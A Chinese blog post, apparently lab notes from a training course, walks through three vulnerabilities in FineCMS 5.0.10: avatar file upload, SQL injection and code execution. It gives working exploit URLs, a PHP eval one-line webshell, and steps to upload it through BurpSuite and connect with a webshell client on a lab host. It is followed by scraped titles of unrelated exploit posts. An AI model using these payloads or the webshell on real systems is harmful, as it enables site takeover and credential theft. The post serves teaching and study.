FineCMS 5.0.10漏洞集合
笔记地址: https://www.ichunqiu.com/course/59007
操作机:
Windows xp
IP:172.16.11.2
目标机:
Windows xp
IP:172.16.12.2
实验目的:
学习漏洞产生的原理
学习如何对此漏洞进行利用修复
实验内容:
FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10版本存在任意文件上传(SSV-93211),任意代码执行(CVE-2017-11585)漏洞以及SQL注入漏洞。
其中任意文件上传漏洞在上传用户头像处,可通过上传一句话木马,修改数据包内容,获取网站Shell。任意代码执行可利用漏洞,构造Payload执行任意代码,而SQL注入漏洞则可以通过注入获取到管理员的账号密码。此次FineCMS 5.0.10漏洞集合,危害巨大,将直接威胁到服务器的安全。
影响版本
FineCMSV5.0.10
实验步骤
步骤1:分别了解漏洞产生原理
第一:文件上传漏洞
漏洞代码位于/finecms/dayrui/controllers/member/Account.php 177~244,具体是在用户头像上传的地方,核心代码如下:
如上,代码仅判断了是否是图片类型,这个判断很容易绕过,只需使用抓包工具修改即可。
第二:sql注入漏洞
漏洞代码位于/finecms/dayrui/controllers/Api.php中的data2()函数,
这个函数可以调用到其他的敏感函数,函数传入的参数进入了data= data = this->template->list_tag($param),正常来说系统封装的函数是用户不能调用的,但这里用户可以调用data函数,我们继续追踪,查看/finecms/dayrui/libraries/Template.php,代码如下:
如上,将Sql语句处理后赋值给sql变量,最终直接执行。
构造Payload如下:
重要代码:
sql注入代码:
index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=action=sql sql='select user();'
第三:代码执行漏洞
上传代码:
index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=action=cache name=MEMBER.1'];phpinfo();$a=['1
步骤二:(建议直接使用漏洞)
top one:(1、访问网址,注册账号)
首先登陆目标网址:172.16.12.2,注册账号:user1 密码:user1
文件上传已知在头像上传处,我们使用账号密码为user1 user1来登陆,在会员中心->上传头像上传文件。
top two:上传木马,将木马传到服务器上
登陆之后在桌面创建文件1.txt,写入一句话木马:
<?php eval($_POST["a"]);?>
其中的a为使用菜刀软件的密码然后将名称修改为1.png,接下来点击上传头像。
在上传之前,我们需要设置浏览器代理,这样才能抓取到数据包:依次点击设置->高级->网络->设置,将代理设置为127.0.0.1:8080,并打开BurpSuite。
我们将png修改为php,点击Foward放行。这里如果报错,无需理会。
上传木马文件目的是
top three:菜刀连接访问
通过查看CMS框架,可以知道上传文件存储于uploadfile\member\3下
使用菜刀软件可以直接访问:http://172.16.12.2/uploadfile/member/3/0x0.php (木马路径), 其中末尾的.php为一个木马文件,密码为‘a’
进入服务器后台,可以直接查看到flag.txt
top four:sql注入漏洞:查找后台管理员账号密码
top five:上传代码
FineCMS 5.0.10漏洞集合相关推荐
- FineCMS 5 0 10漏洞集合
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 笔记地址 ...
- 熊海CMS 1.0代码审计漏洞集合
目录 SQL注入 注入1 注入2 注入3 cookie注入 注入5 XSS 反射型xss1 存储型xss2 反射型xss3 反射型xss4 存储型xss5 文件包含 越权登录 熊海CMS是由熊海开发的 ...
- Razer Synapse 0 day漏洞可获得Windows 10管理员权限
Razer Synapse 0 day漏洞,插入Razer鼠标即可获得Windows 10管理员权限. Razer 是一家知名的游戏设备品牌厂商,提供的产品包括游戏鼠标和键盘.在Windows 10或 ...
- Office 被曝 0 day 漏洞,微软确认 Windows 支持诊断工具存在问题;台半导体厂主管薪水大涨,超 10 人跻身亿元俱乐部
台半导体厂主管薪水大涨,超 10 人跻身亿元俱乐部 台湾半导体产业一直面临人才短缺方面的挑战,近年来,面对激烈的人才市场竞争,为争抢有限的人才,各家厂商纷纷大举提薪征才留才,加之产业景气度向好,半导体 ...
- 【安全漏洞】Struts2漏洞集合总结
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...
- 用友OA/NC/NCCloud漏洞集合
目录 0x01声明 0x02漏洞集合 web.xml prop.xml(数据库配置) 任意文件读取 bsh.servlet.BshServlet 远程命令执行漏洞 用友 NCCloud FS 文件管理 ...
- Struts2 漏洞集合
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...
- %3c php $str1=,thinkphp漏洞集合
整合了一个集合,方便查询 thinkphp 5.0.22 thinkphp 5 thinkphp 5.0.21 thinkphp 5.1.* 未知版本 16.?s=index/\think\modul ...
- 2023 HW 必修高危漏洞集合
2023 HW 必修高危漏洞集合 1 前言 2 漏洞汇总数据 反序列化 逻辑漏洞 命令执行 其他 3 自查高危详情 3.1泛微 e-cology9 FileDownloadForOutDoc SQL ...
- 利用该0 day漏洞的攻击活动情况
谷歌研究人员发现macOS漏洞利用. 谷歌研究人员在macOS系统中发现了一个安全漏洞--CVE-2021-30869.攻击者利用该漏洞可以以kernel权限执行任意代码.8月底,谷歌研究人员发现了该 ...
最新文章
- 约束,索引,rownumrownum
- 哈尔滨工程大学智能科学与工程学院成功举办了“一院一节“暨十二届极速挑战智能车总决赛
- ElasticSearch ected map for property [fields] on field [subject_id] but got a class java.lang
- 强烈推荐的TensorFlow、Pytorch和Keras的样例资源(深度学习初学者必须收藏)
- 边缘计算架构如何融合视频编码与存储
- 【OpenStack】OpenStack系列9之Compute节点安装
- 女生的拳头有多厉害?
- 使用持久内存开发工具包 (PMDK) 创建持久内存感知队列
- 老鸟的Python新手教程
- fcpx教程从入门到精通「3」预览窗口的认识
- 微弱信号检测matlab代码,微弱信号检测方法研究
- python实现图像二分类特异度(numpy)
- remoting 最简单的一个例子
- 技术漫谈:反病毒技术的现状与未来
- JS网页特效实例:让网页前进和后退
- 维恩图是什么?如何使用维恩图?
- HDU 4513 吉哥系列故事――完美队形II(Manacher)
- 西电计科微机原理期末复习笔记
- 用全开源的协同OA办公平台,可以自己搭建OA啦!
- Cocos Creator 随笔(1)-- 世界坐标,相对坐标转换问题
热门文章
- 剑指offer之斐波那契数列求解
- 424. Longest Repeating Character Replacement
- Quarkus 初见
- 解决在stata横向合并出现的not uniquely identify observations in the using/master data
- 整数乘法的计算机方法,太实用了!小学数学四则运算技巧及简便方法
- 微信公众号模板如何使用?公众号模板教程!
- Python JsonPath 详细使用
- 第三十三章:修改SpringBoot启动Banner
- 安卓手机连接Mac电脑可用的管理工具:Android File Transfer
- 画皮用计算机怎么弹山妖,山妖(翻自 小星星Aurora)歌词